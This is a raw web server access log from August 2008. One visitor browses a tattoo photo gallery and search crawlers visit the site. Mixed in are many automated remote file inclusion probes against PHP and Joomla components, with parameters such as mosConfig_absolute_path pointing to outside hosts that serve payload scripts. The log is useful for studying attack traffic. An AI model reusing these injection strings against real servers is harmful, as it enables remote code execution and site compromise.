190.47.109.27 - - [01/Aug/2008:20:16:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
190.47.109.27 - - [01/Aug/2008:20:16:46 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.17.162.125 - - [01/Aug/2008:20:20:07 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
85.17.162.125 - - [01/Aug/2008:20:20:08 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.6.18.231 - - [01/Aug/2008:20:22:33 -0500] "GET /logs/access_log.1192579200 HTTP/1.0" 200 182599 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.79.75.195 - - [01/Aug/2008:20:25:09 -0500] "GET /errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
194.79.75.195 - - [01/Aug/2008:20:25:09 -0500] "GET /logs/errors.php?error=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:20:25:53 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
82.98.141.70 - - [01/Aug/2008:20:27:47 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
82.98.141.70 - - [01/Aug/2008:20:27:47 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
207.44.152.61 - - [01/Aug/2008:20:32:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 309 "-""Mozilla/5.0"
66.254.98.142 - - [01/Aug/2008:20:33:45 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
66.254.98.142 - - [01/Aug/2008:20:33:46 -0500] "GET /logs/access_log.1214179200//components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
66.254.98.142 - - [01/Aug/2008:20:33:46 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
66.254.98.142 - - [01/Aug/2008:20:33:59 -0500] "GET /logs/access_log.1214265600//components/com_facileforms/facileforms.frame.php?ff_compath=http://manetu.de/cms_demo//contenido/applets/src/.%20/.bash/errors.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
82.165.39.186 - - [01/Aug/2008:20:38:08 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.76"
82.165.39.186 - - [01/Aug/2008:20:38:08 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
64.222.236.74 - - [01/Aug/2008:20:38:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:20 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:29 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:38:30 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:01 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:02 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:02 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:02 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:02 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:40 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:40 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:40 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:40 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:39:41 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:04 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:04 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:15 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:15 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:15 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
64.222.236.74 - - [01/Aug/2008:20:40:15 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; Dealio Toolbar 3.1.1)"
62.76.116.20 - - [01/Aug/2008:20:40:29 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:20:40:30 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 359 "-""libwww-perl/5.810"
85.14.221.111 - - [01/Aug/2008:20:43:56 -0500] "GET /logs//admin.php?cal_dir=http://www.netops-fr.info/remote/ident.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.14.221.111 - - [01/Aug/2008:20:43:56 -0500] "GET //admin.php?cal_dir=http://www.netops-fr.info/remote/ident.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.6.18.231 - - [01/Aug/2008:20:45:20 -0500] "GET /logs/access_log.1181692800 HTTP/1.0" 200 157867 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.76.116.20 - - [01/Aug/2008:20:46:18 -0500] "GET /logs/access_log.1212883200/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:20:46:18 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:20:46:18 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:46:24 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 331 "-""Mozilla/5.0"
207.44.152.61 - - [01/Aug/2008:20:46:24 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 326 "-""Mozilla/5.0"
62.76.116.20 - - [01/Aug/2008:20:47:38 -0500] "GET /logs/access_log.1207785600/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
64.38.20.210 - - [01/Aug/2008:20:48:29 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
64.38.20.210 - - [01/Aug/2008:20:48:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
64.38.20.210 - - [01/Aug/2008:20:48:29 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:49:47 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:49:47 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:50:30 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:50:30 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
207.58.151.211 - - [01/Aug/2008:20:50:34 -0500] "GET /errors.php?error=http://www.deanlebaron.com/ubbthreads/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.58.151.211 - - [01/Aug/2008:20:50:34 -0500] "GET /logs/errors.php?error=http://www.deanlebaron.com/ubbthreads/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
207.44.152.61 - - [01/Aug/2008:20:50:38 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 352 "-""Mozilla/5.0"
64.38.20.210 - - [01/Aug/2008:20:51:20 -0500] "GET /logs/access_log.1212883200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.thosefunnypictures.com/scripts/echo.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
82.194.66.70 - - [01/Aug/2008:20:54:00 -0500] "GET /logs//s_e404.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
82.194.66.70 - - [01/Aug/2008:20:54:00 -0500] "GET //s_e404.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
80.74.146.175 - - [01/Aug/2008:20:56:33 -0500] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
80.74.146.175 - - [01/Aug/2008:20:56:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 93674 "-""libwww-perl/5.805"
82.194.66.70 - - [01/Aug/2008:20:57:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93669 "-""libwww-perl/5.810"
82.194.66.70 - - [01/Aug/2008:20:57:45 -0500] "GET /?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
74.6.19.166 - - [01/Aug/2008:20:57:58 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [01/Aug/2008:20:57:59 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
202.181.210.195 - - [01/Aug/2008:21:01:09 -0500] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
69.93.189.130 - - [01/Aug/2008:21:04:18 -0500] "GET /?DOCUMENT_ROOT=http://www.listitsellit.us/adpics/raid.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
69.93.189.130 - - [01/Aug/2008:21:04:18 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.listitsellit.us/adpics/raid.txt%0D?? HTTP/1.1" 200 93669 "-""libwww-perl/5.810"
80.74.146.175 - - [01/Aug/2008:21:05:40 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.listitsellit.us/adpics/raid.txt%0D?? HTTP/1.1" 200 93669 "-""libwww-perl/5.805"
80.74.146.175 - - [01/Aug/2008:21:05:59 -0500] "GET /?DOCUMENT_ROOT=http://www.listitsellit.us/adpics/raid.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
193.207.106.54 - - [01/Aug/2008:21:11:49 -0500] "GET //?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.207.106.54 - - [01/Aug/2008:21:12:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.mubune.com//plugins/safehtml/oye.txt?? HTTP/1.1" 200 93674 "-""libwww-perl/5.79"
82.165.253.72 - - [01/Aug/2008:21:12:12 -0500] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
82.165.253.72 - - [01/Aug/2008:21:12:12 -0500] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
213.254.226.234 - - [01/Aug/2008:21:13:41 -0500] "GET /logs//index2.php?path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
213.254.226.234 - - [01/Aug/2008:21:13:41 -0500] "GET //index2.php?path=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
82.165.39.186 - - [01/Aug/2008:21:16:35 -0500] "GET /logs/access_log.1214438400//modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.76"
82.165.39.186 - - [01/Aug/2008:21:16:35 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
